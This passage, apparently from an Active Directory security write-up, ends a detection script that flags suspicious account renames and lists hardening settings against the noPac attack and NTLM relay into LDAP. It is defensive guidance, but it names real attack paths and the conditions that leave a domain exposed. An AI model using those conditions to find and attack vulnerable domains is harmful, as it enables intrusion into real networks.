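        print("suspicious rename:", hit)
```

Beyond the detections, the preventive settings are the ones the write-up's own analysis ran into: MAQ = 0 and no CreateChild on the Computers container stop noPac for ordinary users, and LDAP signing plus channel binding (or simply not running WebClient on servers) removes the relay path into LDAP.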